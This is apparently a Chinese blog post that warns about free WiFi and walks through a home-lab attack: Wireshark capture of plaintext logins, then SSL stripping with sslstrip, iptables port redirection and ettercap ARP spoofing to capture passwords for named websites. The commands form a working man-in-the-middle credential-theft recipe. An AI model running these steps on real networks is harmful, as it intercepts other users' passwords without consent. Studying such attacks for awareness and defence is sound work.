溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊(cè)×
其他方式登錄
點(diǎn)擊 登錄注冊(cè) 即表示同意《億速云用戶服務(wù)條款》

免費(fèi)WiFi,wireshark抓包及sslstrip抓密碼

發(fā)布時(shí)間:2020-05-27 17:26:50 來源:網(wǎng)絡(luò) 閱讀:4756 作者:hfzhoulin 欄目:安全技術(shù)

    因?qū)懥艘欢挝淖?,就有這個(gè)抓包實(shí)驗(yàn)

--------------------------------

話說:“現(xiàn)在我們一到某處,第一件事便是問有沒有WiFi”。WiFi成為當(dāng)下的熱門,在公共場(chǎng)合人們最喜歡免費(fèi)WiFi。但用著用著后不覺QQ被盜了。這WiFi便是誘餌,釣魚人設(shè)了一個(gè)局,我們以為撿到便宜了,須不知,我們上勾了。QQ被盜,郵箱被瀏覽等等。免費(fèi)雖好,請(qǐng)謹(jǐn)慎。

---------------------------------------

1.利用wireshark抓包測(cè)試51cto帳戶及密碼

環(huán)境的搭建

網(wǎng)絡(luò)環(huán)境:網(wǎng)關(guān):192.168.199.1;

測(cè)試主機(jī):192.168.199.101,ubuntu13.04/wireshark;

測(cè)試目標(biāo):51cto.com

步驟

 a.ubuntu 13.04安裝wireshark

      sudo apt-get wireshark

  b. 新建wireshark組把普通用戶加入其中,給wireshark使用權(quán)限

      sudo groupadd wireshark //加組wireshark

      sudo gpasswd -a zozlin wireshark //向組 GROUP 中添加用戶 USER

      sudo chgrp wireshark /usr/bin/dumpcap // 更抓包文件改組

      sudo chmod 4755 /usr/bin/dumpcap //可執(zhí)行權(quán)限

      錯(cuò)誤:免費(fèi)WiFi,wireshark抓包及sslstrip抓密碼

             解決方法:sudo gedit /usr/share/wireshark/init.lua

倒數(shù)第二行原來為:dofile(DATA_DIR.."console.lua")改為--dofile(DATA_DIR.."console.lua")

        

  c. sudo wireshark  選擇網(wǎng)卡(在本機(jī)測(cè)試)

免費(fèi)WiFi,wireshark抓包及sslstrip抓密碼

定過濾規(guī)則

ip.src==192.168.199.100  && http   (源地址及http協(xié)議)

免費(fèi)WiFi,wireshark抓包及sslstrip抓密碼

重點(diǎn) (post application/x-www-form-urllencoded)

先試試天涯論壇和163郵件的密碼,ssl己加密傳輸了。后51cto 發(fā)現(xiàn)是明文帳號(hào)密碼

免費(fèi)WiFi,wireshark抓包及sslstrip抓密碼

-----------------------------------------


2.利用sslstrip和ettercap突破ssl嗅探密碼

環(huán)境的搭建

網(wǎng)絡(luò)環(huán)境:網(wǎng)關(guān):192.168.199.1;

***主機(jī):192.168.199.101,ubuntu13.04/wireshark/sslstrip;

被***主機(jī):192.168.199.105/103,虛擬機(jī)Windowsxp,IE6;

測(cè)試目標(biāo):51cto.com  mail.163.com  tianya.cn  baidu.com

步驟

下載 

http://www.thoughtcrime.org/software/sslstrip/


 解壓

 tar -zxvf sslstrip-0.9.tar.gz


 安裝

 sslstrip python setup.py install


打開ip_forword轉(zhuǎn)發(fā)   

 echo “1”>/proc/sys/net/ipv4/ip_forward


使用Iptables過濾數(shù)據(jù)包   //通過iptables 把所有http數(shù)據(jù)導(dǎo)入到10000端口,我們用sslstrip監(jiān)聽10000端口,并得到我們想要的數(shù)據(jù)

iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-port 10000

sslstrip -l 10000


利用ettercap進(jìn)行arp欺騙

ettercap –T –q –M arp:remote /192.168.199.103/ /192.168.199.1/


成果

免費(fèi)WiFi,wireshark抓包及sslstrip抓密碼

mail.163.com  51cto.com     破

baidu.com    密碼再次加密了

tianya.cn   未破


參考1.http://www.freebuf.com/articles/web/5929.html

        2.http://www.blogjava.net/heyang/archive/2011/04/05/340330.html

      3.http://www.linuxde.net/2011/11/2522.html



向AI問一下細(xì)節(jié)

免責(zé)聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng),如果涉及侵權(quán)請(qǐng)聯(lián)系站長(zhǎng)郵箱:is@yisu.com進(jìn)行舉報(bào),并提供相關(guān)證據(jù),一經(jīng)查實(shí),將立刻刪除涉嫌侵權(quán)內(nèi)容。

AI